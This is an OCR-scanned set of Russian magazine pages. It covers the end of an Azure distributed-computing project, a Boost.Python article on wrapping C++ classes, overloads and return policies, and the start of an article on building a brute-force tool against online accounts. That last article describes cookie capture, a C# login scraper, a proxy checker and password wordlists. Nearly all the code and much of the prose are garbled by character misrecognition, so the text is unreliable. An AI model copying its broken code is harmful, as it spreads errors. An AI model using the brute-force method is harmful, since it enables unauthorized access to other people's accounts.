передаваемого ему параметра: Ігие — создание 
учетной записи, Іаізе — вход клиента на сервер. 
Этот метод вызывает метод Ведізіег на стороне 
сервера. 

Разработанный проект можно развернуть 
в облаке или локальном эмуляторе А2иге. Раз- 
вертывание сервиса в облаке выполняется после 
выбора пункта РиЫізІт в контекстном меню соз- 
данной ѴѴогкег-роли. Запуск проекта в локальном 
эмуляторе — по нажатию на <Е5> в среде разра- 
ботки. 

Локальный эмулятор предоставляет воз- 
можность одновременного запуска и сервера, 
и вычислительного клиента. Для отладки в ло- 
кальном эмуляторе вычислительного клиента 
нужно в файле МогкегПоІе.сз, входящем в проект 
клиента, изменить адрес сервера (переменная 
епсіРоіпІ), а в интерфейсе управляющего клиен- 
та указать следующий адрес сервера: пеі.іер:// 
ІосаІИоз1:3030/СІоисІ5егѵісе. 

ЗАКЛЮЧЕНИЕ 

Проект, описанный в статье, конечно же, можно 
использовать не только для вычисления простых 
чисел. Он может найти свое применение в рас- 
пределенной обработке звука, изображений, 
видео. 

Возможности совершенствования проек- 
та можно связать с полноценной реализацией 
дуплексного режима обмена данными. В таком 
случае клиент не должен будет постоянно опра- 
шивать сервер, а запросит данные после того, 
как получит от сервера сообщение об их доступ- 



ПУБЛИКАЦИЯ ПРОЕКТА 

Настройки для публикации проекта ты можешь получить по ссылке э . М . Примеча 

ние: сначала зайди в свой аккаунт Агиге. 

САЙТЫ ПО РАСПРЕДЕЛЕННЫМ ВЫЧИСЛЕНИЯМ 

Получить информацию и присоединиться к проектам распределенных вычислений ты смо- 
жешь на сайтах I л сіізігіьиіесі.ги. ѵѵ.боіпс.ги. 




ѵоо 



Кодинг 
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Ускоряем 
разработку на С++ 
с помощью Воозі. 
РуіНоп 




Владимир «дна» Керимов 

ведущий С++ разработчик 
компании «Тензор» 




Крупной компании, написавшей платформу 
для разработки слоя бизнес-логики на С++, 
потребовалось ускорить разработку прикладных 
проектов для нее. Одно дело — писать на С++ 
ядро функционала, оптимизировать его 
и отлаживать, совсем другое — создавать 
для него приложения: медленная сборка 
на С++ отравит жизнь любому. А высокий порог 
вхождения в С++ не позволит задействовать 
в разработке прикладных программ много 
людей. Как же поступить? 



ПОСТАНОВКА ЗАДАЧ И 

Поскольку прикладной функционал уже был логически поделен на сущ- 
ности и методы, написанные на С++ или на 50Ц самым логичным было 
взять скриптовый язык, популярный, легкий в освоении и, главное, чтобы 
с его помощью можно было налаживать взаимодействие с функционалом 
ядра из С++ и обратно. Если подытожить требования, то выбранный язык 

• должен быть простым; 

• в отличие от С++ не требовать компиляции при изменении; 

• в отличие от 50І_ выполняться не на слое БД, а на слое бизнес-логики, 
что позволит вызывать другие методы, на чем бы те ни были написа- 
ны: С++, 501- или на этом языке X. 

Важно было не ошибиться, ведь язык скриптовой обвязки надолго 
определял вектор развития компании. 

НА РАСПУТЬЕ 

Выбор был неочевиден, В основном противники разделились на три са- 
мых крупных лагеря: ^ѵаЗсгір* Ѵ8, ВиЬу Нісе и ВоозіРуІНоп {конечно, 
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если не считать предложений поселить весь слой бизнес-логи- 
ки на стороне базы данных и переписать все методы на храни- 
мые процедуры). Звучали голоса в поддержку и нескриптовых, 
но легко компилируемых иаѵа и С# — каждый разработчик вся- 
чески агитировал за тот язык, с которым был больше знаком. 

Поскольку разрабатывать скриптовую обвязку выпало лич- 
но мне, то выбор передо мной стоял сложный. Руководство 
склоняло к обвязке на ПиЬу, через сырую Пісе либо используя 
С АРІ. Веб-отдел, предпочитающий решения на ІЧосІе^, ра- 
товал за выбор обвязки на ^ѵаЗсгірі и Ѵ8. Библиотека Воозі, 
широко используемая в разработке платформы на С++, гово- 
рила в пользу Воозі.РуіНоп, как и ряд программистов на С++, 
хорошо знающих РуіНоп (вариант переноса слоя бизнес-логики 
в РозідгеЗСМ. мы всерьез даже не рассматривали — это было бы 
чревато неправильно кешируемыми хранимыми процедурами 
и отсутствием возможности учитывать схемы, по которым были 
разбиты клиентские базы). 

ВЫБОР ВООЗТ.РѴТНОЫ 

В конце концов, оценив бесперспективность обертки через 
нестабильный функционал ПиЬу Пісе, а также удорожание 
разработки поверх ПиЬу С АРІ, пришлось отказаться от ИиЬу 
как скриптового языка. Другие два решения: Ѵ8 (иаѵаЗсгірі) 
и Воозі.РуіНоп (РуіНоп) — выглядели намного привлекательнее. 

Сравнив богатство библиотек РуіНоп с молодым (для сер- 
верной стороны) набором иаѵаЗсгірі, предназначенным боль- 
шей частью для МосІе83, я остановил свой выбор на мощном ме- 
ханизме Воозі.РуіНоп, позволяющем писать модули для РуіНоп 
на С++ в стиле РуіНоп. 5ѴѴІ6 не подходил, поскольку требова- 
лось из РуІНоп в С++ попадать так же свободно, как и из С++ 
в РуІНоп. С АРІ, учитывая объем работ, однозначно не годился. 

С библиотекой Воозі.РуіНоп у нас сразу заладились хоро- 
шие отношения, и я не раз убедился, что это действительно 
лучший выбор для обвязки С++ функционала при разработке 
приложений епіегргізе-уровня. Сыграла на руку и простота ос- 
воения языка РуІНоп, читабельность его кода и богатство би- 
блиотек на РуІНоп. 

В самой обвязке и взаимодействии с С++ функционалом 
все настолько просто, что сродни магии. Магии порталов между 
мирами С++ и РуІНоп, мирами языков настолько разных и так 
нуждающихся в возможностях друг друга. 

ВЫБОР РѴТНОЫЗ 

Когда с выбором языка было покончено, возник вопрос — какую 
ветку РуІНоп использовать: 2.x или 3.x? Сделав ставку на долго- 
срочную перспективу, выбор остановили на РуІНоп 3. 

Во-первых, третья ветка изначально лишена дефекта пута- 
ницы между строкой и байтами, во-вторых, исходный код пи- 
шется только в кодировке ІІТР-8, ну и в-третьих, РуІНоп 3 избав- 
ляет от доисторического наследия синтаксиса, которым часто 
грешит РуІНоп 2. 

Несовместимость версий РуІНоп 2 и 3 не пугала, большая 
часть функционала была уже написана на С++, и даже если 
какие-то библиотеки к тому времени еще не были портированы 
на РуІНоп 3, то они больше напоминали пережиток древности 
и спокойно заменялись альтернативами либо на С++, либо но- 
выми библиотеками, написанными уже для РуІНоп 3. 

ОТКРЫВАЕМ ПОРТАЛ МЕЖДУ С++ И РУТНОЫ 

Для начала давай вспомним, что общего есть между С++ 
и РуІНоп: классы, методы, исключения, общие типы скаля- 
ров. Так вот, все это Воозі.РуіНоп автоматически конвертирует 
при переходе между С++ и РуІНоп и обратно, неявно вызывая 
тонну РуІНоп С АРІ и проверяя корректность преобразований 
еще на этапе компиляции обертки С++ функционала. 

О’кей, звучит круто, но как это выглядит на практике? Очень 
просто. Предположим, у нас есть модуль с классами и их мето- 
дами. Обертка с помощью Воозі. РуіНоп пишется очень легко: 
описывается аналогичный модуль для РуіНоп и с помощью ме- 
таязыка шаблонов С++ пишется код, подозрительно напоми- 
нающий РуіНоп. Но давай посмотрим, как это работает на кон- 
кретном примере. 



С-8ісІе 

Ниже код некоего абстрактного модуля Ьзоп с классом Пеабег 
и методом геаб, написанными на С++: 



В005Т РУТНОЫ МОРШЕГЬбоп) 

{ 

с1аз5 <Ьзоп: : КеасІ е г>( "Кеабег"} 

.сІе-Г("геасГ . & Ьзоп: :КеасІег: :геасІ) 

■ 

.1 

} 



Обрати внимание, что шаблон сІазз_ не имеет ничего о 
щего с ключевым словом сіазз обоих языков, а метод беі все- 
го лишь метод шаблона сІазз_, однако визуальный эффект 
достигнут — код обертки легко читается и выглядит понятно 
и знакомо. Теперь можно и скомпилировать. 



РуІІіоп-зісІе 

После компиляции можно наш свежесобранный модуль Ьзоп 
импортировать из РуіНоп, создавать экземпляры класса 
Ьзоп.Неабег и вызывать у него метод геаб, по сути обертку, 
которая напрямую позовет метод геаб класса Ьзоп::НеасІег, 
написанного на С++. 



і гпро гіі Ьзоп 

геасіег = Ьзоп, Кеабег() 
геасіег . пеаб( ) 

Магия портала в том, что мы можем использовать 
как С++ в РуіНоп через модули, так и РуіНоп в С++ через те 
же модули и их подключение. Динамическая типизация 
РуіНоп на стороне С++ обеспечивается специальным типом 
Ьоозі:: руіНоп ::оЬ]есі, который является контейнером для лю- 
бого типа РуіНоп в С++. Вот так мы получаем динамическую 
типизацию на стороне С++І 

Теперь посмотрим на другой пример: 

рЬдесб -)зоп = п 1("1 

оЬ тесб гез __= ^50п . аббг( ) (<-* 

кеу\ ѵа1ие\ ); 

збгіпе ѵаіие = ехбгас1:<5бгіп§>(ге5["кеу' ]) ; 

Этот код аналогичен выполненному на РуіНоп ^5оп, 
1оабз( 1 {"кеу" : "ѵаіие"} 1 ), но написан на С++, что позво- 
ляет вызывать из функционала платформы любую обертку, 
как и любую библиотеку РуіНоп. Это весьма полезно для ис- 
пользования обобщенных механизмов, работающих из С++ 
с кодом на РуіНоп. В нашем случае это вызов методов биз- 
нес-логики, написанных на РуіНоп, ядром бизнес-логики, на- 
писанным на С++. 

Вся работа из С++ с библиотеками на РуіНоп сводится 
к трем основным функциям: 

• ітрогі; 

* аііг; 

■ ехігасі. 



Функция ітрогі(" модуль") возвращает по сути Ьоозі:: 
руіНоп ::оЬіесі, представляющий объект модуля, который мы 
импортируем с теми же самыми атрибутами. В свою оче- 
редь, атрибут любого объекта РуіНоп с помощью оЬіесі Воозі. 
РуіНоп можно получить методом оЬіесі: :аііг( т, атрибут"), воз- 
вращающим такой же оЬіесі, связанный с классом, методом, 
переменной — в общем, любым объектом языка РуіНоп. 

Функции РуіНоп можно вызывать из С++ перегружен- 
ным оператором оЬіесі: :орегаіог(), доступ к элементам 
массивов РуіНоп из С++ получаем с помощью перегрузки 
оЬ]есі::орегаіог[], и то и другое возвращает оЬіесі, связан- 
ный с результатом операции в РуіНоп. Чтобы добыть из оЬіесі 
нужный тип Т языка С++, нужно явно вызвать шаблонный 
функтор ехігасі<Т>(объект). Чтобы, наоборот, получить 
из типа Т тип оЬіесі, достаточно передать его в конструктор 
при создании оЬіесі(значение). При этом в обе стороны, 
скрытый от глаз разработчика, не покладая рук трудится кон- 
вертер Воозі.РуіНоп. 

Стандартные типы языка РуіНоп зіг, Іізі и сіісі представ- 
лены в библиотеке Воозі.РуіНоп соответственно классами 
зіг, Іізі и сіісі, унаследованными от оЬіесі. В принципе, ни- 
что не мешает нам работать с Іізі через оЬіесі, вызывая ме- 
тод аррепб через аііг{"аррепсГ), но куда удобнее позвать 
Іізі::аррепсІ из С++. 



г 



Кодинг 
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Вероятно, самым существенным различием между С++ 
и РуФоп является сборщик мусора РуФоп {ОС — дагЬаде 
соііесіог}, которого нет в С++. Работа с указателями и ссылками 
на стороне С++ держится на уровне мастерства разработчика, 
который не дает памяти «утекать» (на память перестают ссы- 
латься, но удалить ее забыли), а указателям «ездить по памяти» 
{указатель на объект вышел за пределы отведенной ему памяти 
и начал затирать данные других объектов). В РуФоп ненужные 
объекты, на которые перестали ссылаться, автоматически уда- 
ляются специальным механизмом сборки мусора. 

В случае обертки метода, возвращающего указатель или 
ссылку, в С++ обычно подразумевается какое-то действие: 
либо это указатель, переданный во владение пользователю ме- 
тода, либо это ссылка на существующий объект, который уда- 
лять нельзя. Все это нужно объяснить сборщику мусора РуФоп, 
когда мы оборачиваем метод, возвращающий указатель или 
ссылку. Исключение составляет сопзІсИаг*, который автомати- 
чески преобразуется в строку зіг на стороне РуФоп. 

Чтобы объяснить сборщику мусора, что нужно делать с ука- 
зателем, который пришел из метода на С++, нужно прописать 
политику возвращаемого значения через шаблонную функцию 
геШгп_ѵаІие_роІісу при обертке метода. Параметром шаблона 
передается одна из политик: вернулась ссылка на существу- 
ющий объект геФ гепсеехізН пдобі ес! , и удалять его нель- 
зя, нам вернули ссылку на новый объект тападе_пеѵѵ_оЬ]ес1: 
и передали во владение, чтобы мы удалили его по окончании 
использования, и еще пара функций сору_сопз{_геФгепсе 
и сору_поп_сопз1_геТегепсе для того, чтобы создать новый объ- 
ект, скопировав его по ссылке, вернувшейся из метода. 

Чаще всего методом возвращается ссылка на элемент объ- 
екта, который тяжело возвращать по значению. Например, у нас 
есть запись выборки из базы данных с1а!а::Песогс1 и нам нужно 
прочитать какое-то поле Раіа::РіеІс1 из этой записи. Логичнее 
всего перегрузить орегаіог[], который будет возвращать ссыл- 
ку на хранящееся в записи поле ба1а::Ріе!сі&. Чтобы обернуть 
ссылку-результат объектом РуФоп, при изменении которого 
будет изменяться исходный объект С++, нам понадобится по- 
литика геФгепсе_ехіз1:іпд_оЬ]ес1 примерно так: 



В005Х_РУТН0№_М00и1_Е(с!а'1:а) 



{ 




сіазз <с!а±а :: КесогсІ >( 


) 



.гіѳі : (" неігігеш ". Хсіаба : : КесогсІ : : ^ 

орегаЕог [ ] л 

гебигп_ѵа1ие_ро1ісу 
<ге~Регепсе_ехіз1:іп ^_ оЬі'есб>( ) ) 

« 

» 

} 

Если нужно клонировать объект методом сіопе, то создаем 
новый объект и передаем его во владение вызвавшему коду. 
Для РуФоп требуется указать политику тападе_пеѵ/_оЬіесб 

В005Т_РѴТН0М_М001ЛЕ(сІаба) 

{ 

с1а55 ссіаба : :Кесог*сІ>(" КесогсІ"^ 

.сіе^Г’сІопе" . &гіа~Еа : іКешггі! : :с !опе^ 

геѣцггі _Уа1ие_ро11су<-‘ 

<іпапа§е_пеы_оЬ]ес'С>( ) ) 

■ 

1 

} 

Когда возвращается ссылка на тип, который конвертирует- 
ся в соответствующий тип РуФоп без обертки, например ссыл- 
ка на зіеФзФпд, конвертирующийся в зФ, то требуется указать 
политику сору сопз^геі'егепсе или сору поп сопзі геіегепсе. 
Просто так обернуть функцию, возвращающую указатель или 
ссылку, через Воозб РуФоп, увы, не получится, библиотека от- 
ловит еще на этапе компиляции попытку обернуть неопреде- 
ленное поведение для сборщика мусора для возвращаемого 
значения. 

Пусть у нашего поля записи баІа::РіеІб есть имя, которое 
хранится в виде зМ::з1ппд, и методом пате{) возвращается 
сопзі зШ::зФпд& — константная ссылка на имя поля, В этом 
случае обертка метода будет выглядеть так: 

В005Т_РѴТН0М_М001ЛЕ ( сіаіа ) 

{ 

сіа зз ксіаба : : Ріе1сіу( _) 

^ ( ,_&даба : : Ріеісі: : пате^ 

ге*игп_ѵа1ие_ро1ісу 

<сору_сопз1:_ге-Регепсе>() ) . 

■ 

.* 

I 




ШРО 



При указании политики 
геІегепсе_ехі5ііпд_оЬ)есі 
возвращается все равно 
новый объект. 8 нем со- 
держится ссылка на объ- 
ект С++, для которого 
должна существовать 
обертка в РуФоп. 




ШРО 



Политики сору С0П5І 
геіегепсе и сору_ 
поп_сопзІ_ге(егепсе 
действуют не только 
на типы с конвертацией, 
описываемой через 
Іо руФоп сопѵегіег, это 
самый логичный путь 
обернуть метод С++, 
возвращающий в РуФоп. 
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Портал между мирами 



ЮЗ 



РАБОТАЕМ С ПЕРЕГРУЗКАМИ 



МЕТОДОВ С++ 

РуІЬоп не умеет перегружать методы. РуІЬоп не может огра- 
ничить тип аргумента. Поэтому порой первым действием раз- 
работчика метода на РуІЬоп бывает проверка ізіпзіапсе одного 
из аргументов или вызов скрытых (ргіѵаіе) методов в зависи- 
мости от количества и типа аргументов — по сути перегрузка 
вручную. Язык С++ обладает статической типизацией, что по- 
зволяет вызывать одноименные методы с разной реализацией 
для разного количества и типа аргументов. 

Воозі. РуІЬоп позволяет оборачивать методы С++ одно- 
именными методами РуІЬоп, поддерживая перегрузку на сто- 
роне РуІЬоп! 

Технически это решается гипііте — на этапе выполнения, 
просто выбирается подходящая перегрузка метода на С++ 
и вызывается нужный метод либо генерируется исключение, 
что необходимая перегрузка не найдена. 

Пусть есть класс поля записи выборки из базы данных 
сіаіа:: Ріеісі, типизируемый динамически {в С++ это можно сде- 
лать, например, через ЬоозІ::ѵагіапІ). Поле задается значе- 
нием произвольного типа через перегрузку метода РіеІсІ: :зеѣ_ 
Ьу(значение) по типу аргумента. Например, так: 

В005Т_РѴТН0М_М001І I Е ( Раба ) 



{ 
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В РуІЬоп мы получаем один метод- обертку, который при вы- 
зове от типа аргумента вызовет перегрузку метода С++ соот- 
ветствующего типа. 



сіаііа 



Ріеісі = 


сіаіа . Ріеіс1( ) 
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Но самое интересное — это перегрузка конструктора іпіі 

в РуІЬоп, хотя бы просто потому, что доступ к конструктору С++ 
вообще-то запрещен, однако все перегрузки конструктора обо- 
рачиваемого класса можно без проблем передать в РуІЬоп! 

с1а55_<с1аіа : : Ріеісі > ( л іпіі<с!оиЫе>) 



(іпіікіо пе 1 оп§>) 

(іпііхз'Есі: :5~Егіп^>) 

(іпііо) 



При создании объекта -обертки в РуІЬоп вызывается нужная 
перегрузка конструктора исходного типа сіаіа:: Ріеісі в С++. Это 
ли не чудо?! 

На практике это будет выглядеть так: 



пот сіаіа іт 


рогі Ріеісі 







а = Ріеісі ( ) 




Ь = Р іеШ ) 



с = Р іеісК 
сі = РіеШ) 
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Ложка дегтя 

Перегрузка методов в РуІЬоп выглядит соблазнительно, но есть 
один момент: Воозі. РуІЬоп может запросто перепутать пере- 
грузку, поскольку подбирает подходящую сигнатуру метода 
С++ уже на этапе выполнения! 

В отличие от компилятора С++, который может выбрать 
из всех возможных перегрузок метода наиболее подходящую 
для списка аргументов еще на этапе компиляции, библиотека 
Воозі. РуІЬоп вынуждена обходиться первой подошедшей сиг- 
натурой метода, Усложняет дело то, что іпі и ЬооІ прекрасно 
преобразуются друг в друга, также прекрасно преобразуется 
іпі во Ноаі. Чтобы совсем осчастливить разработчика, подбор 
наиболее подходящей перегрузки из обернутых идет из конца 
в начало, то есть первой попробует себя на роль вызываемого 
метода последняя обертка и далее снизу вверх. Другими сло- 
вами: объявляем перегрузку от Иоаі после перегрузки от іпі 
и никогда не попадем в перегрузку от іпі, а если после пере- 
грузки от іпі обернуть перегрузку от ЬооІ, то будем попадать 
только в него, даже вызывая перегрузку от целочисленного 
аргумента. 

Но выход есть, он прост и ясен для любого, кто знаком с по- 
нятием зеіі в РуІЬоп. 




ШРО 

В РуІЬоп довольно 
просто создать ргіѵаіе - 
метод. Для этого всего 
лишь нужно назвать 
его начиная с двух под- 
черкиваний, например 
_Ькі(іеп_теІІіосІ. 



* 



Кодинг 
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До сих пор мы пользовались встроенным в Воозі. РуіІіоп преобразованием 
неявно передаваемого параметра ІІііз в С++ в параметр зеІІ в РуіІіоп. Также 
известно, что в РуІІіоп любая функция, принимающая первым параметром 
зеіі-аргумент, может считаться методом и, наоборот, метод можно вызывать 
как простую функцию, передавая зеіі явно. Все это можно сделать на стороне 
С++ в виде внешней функции, принимающей зеІТ, и обернуть ее как полно- 
ценный метод класса-обертки. 

Таким образом, для задания своей логики в обертке не надо городить 
классы-наследники или портить исходный класс логикой, нужной только 
в РуіІіоп, и уродовать АРІ на стороне С++. Все, что требуется, — написать 
внешнюю функцию, принимающую первым параметром ссылку на зеіі нуж- 
ного типа, и на стороне РуІІіоп это будет полноценным методом класса. Вот 
так, например, решается наша проблема с перегрузкой: 

уоіб Р іеісі зеф Ьу ^ сіа'ііа : : Ріе1сІ& зеН^ оЬ^есІ: ѵаіие) 

і 

іТ(ѵа1ие ± І5_попе( ) ) 

зеІ-Р. зеб_Ьу(піі11р1г) ; 

еізе іі (РуВоо1_СНеск( ѵаіие. ріг( ) } ) 

зеІ-Р. зеТ_Ьу(ехІгасТ<Ьоо1>(ѵа1ие) ]Ц 

еізе і і (Руі_оп§_СІіеск( ѵаіие. рТг( ) ) ) 

зеІ-Р. 5еТ_Ьу(ехІгасТ<1рпе_1оп^> (ѵаіие) ) і 

1 - 

В005Т_РѴТН0!\І_М(ЮІІ !_ Е ( сі аіа ) 

і 

с1азз_<сІа1а:і_Ріе1сІ>( ) 

. :к ( 1 г. еі л Рі.е1б_зеб_Ьу ) 

ф> 

д 

} 

Мы мало того что избавились от проблемы с перегрузкой, так еще и ре- 
шили ее чисто. Логика обертки в РуІІіоп сохраняет все свойства исходного 
класса С++, и не теряется прозрачность обертки — главное условие хорошего 
межязыкового АРІ. Программист на РуІІіоп, знающий особенности исходного 



АРІ, просто пишет на РуіІіоп так же, как он писал бы на С++, при работе с объ- 
ектом класса, но уже в стиле РуіІіоп. 

Проверяем в РуіІіоп, что получилось: 

•р гот сіаба ітрогіі РІеІсІ 



Яеісі = РіеІсІО 


Ііеісі.зеі: ЬуПЧопе) 1 












■ ■ ■ — 

Ііеісі.зеі: Ьѵ(Тгие) 1 












Г % Г 

Ііеісі.зеі: Ьу(12 ) іі 













Вот таким нехитрым способом получили бонус в виде перегрузки от Гѵіопе. 
Кстати, вполне можно использовать питоновские типы бісі, Іізі, Іиріе, зіг 
из патезрасе Ьоозі:: руІІіоп, к ним всегда приведется корректно, в отличие 
от скалярных типов. 

Все то же самое верно и для конструктора, просто внешняя функция долж- 
на не принимать зеіі в виде параметра, а возвращать ссылку или указатель 
на новый объект нужного типа. В нашем случае это будет выглядеть вот так: 

сіаіа : : РіеІсІ* РіеІсНіеѵ^Мэу^оЬзесЯоЬзесІ: ѵа іие) 

і 

іі (ѵаіие . із_попе( ) ) 

геііи гп пем Ріеісі(пиіір^г) ; 

еізе (РуВоо1_СІіеск{ ѵаіие. рбг( ) ) ) ж. 

зеІ-Р. 5еб_Ьѵ( ехггас1:<Ьоо1> (ѵа1ие) ) ; * 

‘ ™ ш * і 

} 

В005Т_РѴТН0М_М00Ш_ Е ( сіаіа ) 

{ * 

сіаззсбаіа : :Ріе1сІ >( ) 

. ( , РіеІсІ пеы Ьу оЬіесІ) 

р 

4 

Щ 

} і 

Вот так простые функции становятся методами класса-обертки, помогая 
строить логику класса в РуіІіоп. 



ОБОРАЧИВАЕМ ШАБЛОННЫЙ МЕТОД 



Пусть на стороне С++ у поля сіаіа:: РіеІсІ есть шаблонный метод 
деі<Т>, реализованный для всех допустимых типов. Ріа сторо- 
не РуіІіоп не имеет смысла возвращать кучу разных типов, бу- 
дем возвращать Ьоозі:: руІІіоп ::оЬіесІ. Для демонстрации того, 
как работает обертка шаблонного метода, добавим полю при- 
ведение ко всем возможным типам. 



оЬіесі: РіеІсІ ееі(_соп5б_Ріе1Ь& зеІР) { 

і (зеІ-Р. із пиІІО) 

і ■. и оЬіесіОі 

зшФе Ь ( з еі-р. фу ре ( ) ) { 

сазе РіеІсІ : іОР ВОСИ: 

геііигп оЬіесі: (зеГР. де і<Ьоо!>( )) : 

• сазе РіеІсІ: :0Р_ІМТ: 

геііигп о Ьіесі ( зеІ-Р. ееісіоп е 1о пв>П): 

1 

1 



В005 Т_РѴТ Н0111_МСЮ II І_Е( сіаіа) { 



■ 


сіС'есГ , 


&Ріе1с1 ееі) 


■ 


сі-(" ьооі 


, &Ріе1сІ : : ее1і<Ьоо1>) 


■ 


еЯ" ілФ 


, &Ріе1сІ : : ееікіог 1опе>) 




я? =-= — =“ = "^ — ™ — ЧсДП- щг 


# 

Д 

} 







Ну вот, осталось только добавить в сіаіа: :ПесогсІ мето- 
ды индексации деіііет и зеіііет , Кроме того, если 

в С++ классе определены методы Ьедіп() и епб{) (или ана- 
логичные им), то Воозі, РуіІіоп напрямую пробросит и ите- 
рацию ііег по элементам объекта-обертки. Можно так- 
же перегрузить §еіаі:1:г и 5 еіа 1 іі:г по имени поля, 

тогда получим едва ли не ОПМ поверх обычного С++ класса. 
Все ограничивается только неистощимой фантазией разра- 
ботчика (то есть ничем). 




тв 

Смотри пример раз- 
бора исключений РуіІіоп 
на стороне С++ и транс- 
ляции своих типов 
исключений из С++ 
в РуіІіоп на диске. 




%■ 



ШРО 



А СТОИЛА Л И ИГРА СВЕЧ? 

Безусловно, да. Технология обертки функционала платфор- 
мы через Воозі. РуіІіоп оправдала себя на все сто. Последние 
противники давно стали ее сторонниками и пишут методы биз- 
нес-логики на РуіІіоп. Разработка движется семимильными 
шагами, все, чего нет в С++, находится в РуіІіоп, и наоборот. 
Штат разработчиков пополняется все новыми сотрудниками — 
уже не требуется знание С++, достаточно знания РуіІіоп. Сам 
же Воозі. РуіІіоп зарекомендовал себя как очень стабильная 



библиотека, избавляющая от множества ошибок еще на этапе 
компиляции. 

Но главное — оборачивать код с помощью Воозі. РуіІіоп ста- 
ло по-человечески приятно. Работая с продуманным до мело- 
чей АРІ Воозі. РуІМоп, с тем, как она устроена, многому учишься 
сам — в том числе заботиться о пользователе твоего АРІ так, 
чтобы ему было комфортно. Глядя на устройство Воозі. РуіІіоп 
понимаешь, что такое совершенство. Сам же процесс сродни 
магии... магии порталов между мирами С++ и РуіІіоп. 31 



Все просто: нужен 
специфический метод - 
пишем внешнюю функ- 
цию с эмуляцией зеіі, 
нужен специфический 
конструктор — пишем 
внешнюю функцию, 
возвращающую новый 
объект. . 
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Очень тяжело в последнее время стало с запоминанием паролей. Ресурсов много, все не упом- 
нить, и даже менеджеры паролей по ряду причин пользователям не всегда помогают Как быть? 
В этих случаях простые смертные обращаются к своим друзьям-хакерам, и последние подска- 
зывают им, как восстановить утраченное. 



СНИФИНГ 

Первым делом хакер сам проходит регистрацию 
на целевом ресурсе. Таким образом он получает 
соокіе, небольшой фрагмент данных, применяе- 
мый для аутентификации пользователя, Перехват 
как правило осуществляется при помощи извест- 
ного Вигр Зиііе ( рогізѵѵіааег.пеі/Ьигр ) или набора 
специальных плагинов пентестера для его лю- 
бимого браузера. Вот, кстати, некоторые из них: 
Соодіе СНготе ( ІіпуигІ.сот/ІЬридді ) и Рігекэх 
( ііпѵигІ.сот/оІоеЗао ). 

КОДИНГ 

Добыв печеньку, хакер начинает писать програм- 
му, ее дизайн и функционал от сервиса к сервису 
практически не отличаются. 

Задача программы сводится к получению 
на вход списков логины/пароли, прокси НТТР / 
ЗОСКЗ 4 / ЗОСКЗ 5 и количества рабочих потоков 
процесса. Обязательно должна присутствовать 
огромная кнопка «Старт». 

В нашем примере использована библиотека 
х№1 — библиотека классов под .МЕТ Ргатеѵѵогк 
( йіірз://діШиЬ.сот/Х-гц5/хМе1: ). 

Но перед этим он еще должен получить этот 
самый список логинов: можно набирать его вруч- 
ную, что весьма долго, а можно автоматизиро- 
вать процесс сбора данных парой строчек кода. 
Этот метод принято называть парсингом, суть 
его в случае сбора логинов сводится к получе- 
нию страницы с нужной строкой, ее анализу, со- 
хранению и повтору операции уже со следующей 



страницей. На картинке («Интерфейс») элементы 
управления парсингом находятся в правой части. 

Парсер 

В поле СЕТ хакер вводит адрес сайта для загруз- 
ки, чуть ниже указывает стартовую и последнюю 
страницу, а также шаг между ними. Это требуется 
в случае нумерования страниц в порядке, отлич- 
ном от 1 , 2, 3 ... 

Далее он вписывает уникальный набор симво- 
лов из искомой страницы в два пустых поля, меж- 
ду которыми и находится логин. По сути, вместо 
логина может быть и любая другая интересующая 
хакера информация (телефоны, почта, номер ІСО, 
Зкуре), так что применение парсеров может быть 
весьма широким. Теперь посмотрим, как это при- 
мерно выглядит на С#. 

изіпй (ѵаг КедиезТ = пс ы НбфрРедиеБ'ЬО ){ 
// Загружаем исход н ый текст страницы 

5Ігіп§ 5оиг5Ра§е,; 

з1гіп2[] гаы; 

// Адрес с а йта, куда подставляется 
// номер страницы для сохранения 
ЗоигзРаде = Кедие5і.(де1:Гб1оЬа1.4-‘ 

Рагзегб еі: + МшпЬег) .То5^гіп%( 

// Парсим слово между этими строками 
гам = 5оиг5Ра§е.5иЬ5'Спіпе5(С1оЬа1.н 
РагзегЗТгіпбРгош, С1оЬа1.<-і 
Рагзег5і:гіп§ЕпсІ, 0); 

-Рог (ігѵЕ і = Ѳ; і < г аы. ЬепеТІт : _і±+) 

{ _ 



ІЧіск += гамріі + "\г\ п": 

} 

ге1:игп ІЧіс^ 

} 



// Каждый поток посылает свое 

// у ник аль ное значение 

5 ігіп§ КІіск = СИескРагзегМеТІпосІ(<31оЬа1.«-' 

РагзегТезТІМТ); 

і-Р (ІЧіск ! = и ") { 

СІоЬаІ . РагБегІЧіскМате. АсІсІ(Міск) ; 

(зІоЬа! .Соипббоо гі += 1: 

} еізе ,{ 

СІоЬаІ .СоипТВасІ += 1^ 

1 

Программа загрузила страницу, пробежалась 
по всем строчкам в поисках нужного слова, выве- 
ла результат на консоль. Просто, как раз-два-три. 
Можно сказать, что логины в кармане, остались 
пароли. Придумывать их самостоятельно сложно 
и долго, поэтому чаще всего используются чужие 
словари. Один из самых популярных — госкуои. 
М, а множество других доступно на іпзісіерго.сот 
( йпуигі-сот/рнратаг ). 

Прокси 

Простой, но очень важный компонент: именно че- 
рез прокси направляются все запросы и возвра- 
щаются ответы, что оказывает огромное влияние 
на правдоподобность результатов работы про- 
граммы. Хакеры не желают терять время впустую 



Г 1 

Р ЭІДІ 


г Т 


1 


Г ^ 

Нзх 



СЕТ _ = — - =_ - НТТР/ 1.1 

НозЪ: ^ _ 

ІГзег^АдепЪ : Ног і 11 а/ 5.0 (Ѵігкіожз ГЛ 5 . 1 ; гѵ : 2 3 . 0 ) Сеско /20100101 Гіге^ох /23 . □ 
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Так выглядят куки 
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Парсим, брутим, вспоминаем! 



107 



и поэтому встраивают механизмы их проверки. 
Рассмотрим один из примеров такого кода. 

Кериезі: . Ргоху = Н-С1:рРгохуС1іеп1: ,<-* 
Рагзе(ргоху) ; 

Кеяиезі .Се*( "ІтЫр: //^оо^іе. сот"); 

геіигп Ігііе: 

саІісЬ { 

геітгп -Раізе: 

} 

К запросу прикрепляется прокси, и он пыта- 
ется сходить на доодіе.сот. Если до него удает- 
ся достучаться, то возвращается Тше, если нет, 
то возникает ошибка и программа вернет Таізе. 
Такой простой способ проверки может значитель- 
но повысить результативность работы программы 
с использованием публичных прокси-серверов. 

Брут 

Подготовительный этап пройден, хакер добыл все 
необходимое и переходит к написанию брута. За- 
дача программы — получить данные и произвести 
их проверку на удаленном сервере. Еще раз об- 
ратимся к картинке интерфейса, теперь в нем ис- 
пользуются левая и нижняя части окна. Здесь пе- 
речислены кнопки для загрузки логинов, паролей 
и прокси. Также справа от первых двух есть текст- 
боксы, их предназначение сводится к проверке 
одного логина на множество паролей и наоборот. 
В выпадающем списке справа от кнопки прокси 
